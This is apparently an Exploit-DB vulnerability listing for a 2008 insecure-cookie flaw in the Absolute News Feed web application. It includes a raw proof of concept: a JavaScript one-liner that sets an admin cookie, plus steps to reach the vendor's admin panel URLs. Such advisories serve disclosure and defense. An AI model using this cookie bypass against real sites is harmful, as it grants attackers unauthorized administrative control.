Absolute News Feed Insecure Cookie Vulnerability

vendor:

Absolute News Feed

by:

Hakxer

3.3

CVSS

LOW

Insecure Cookie Vulnerability

264

CWE

Product Name: Absolute News Feed

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Absolute News Feed Insecure Cookie Vulnerability

A vulnerability in Absolute News Feed allows an attacker to gain administrative access by setting a cookie value. An attacker can set the cookie value to 'xlaAFSuser=p=admin' and then access the administrative panel at http://www.xigla.com/absolutenf/demo/menu.aspx.

Mitigation:

Ensure that cookies are properly validated and that only valid values are accepted.

Source

Exploit-DB raw data:

########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# milw0rm.com [2008-10-31]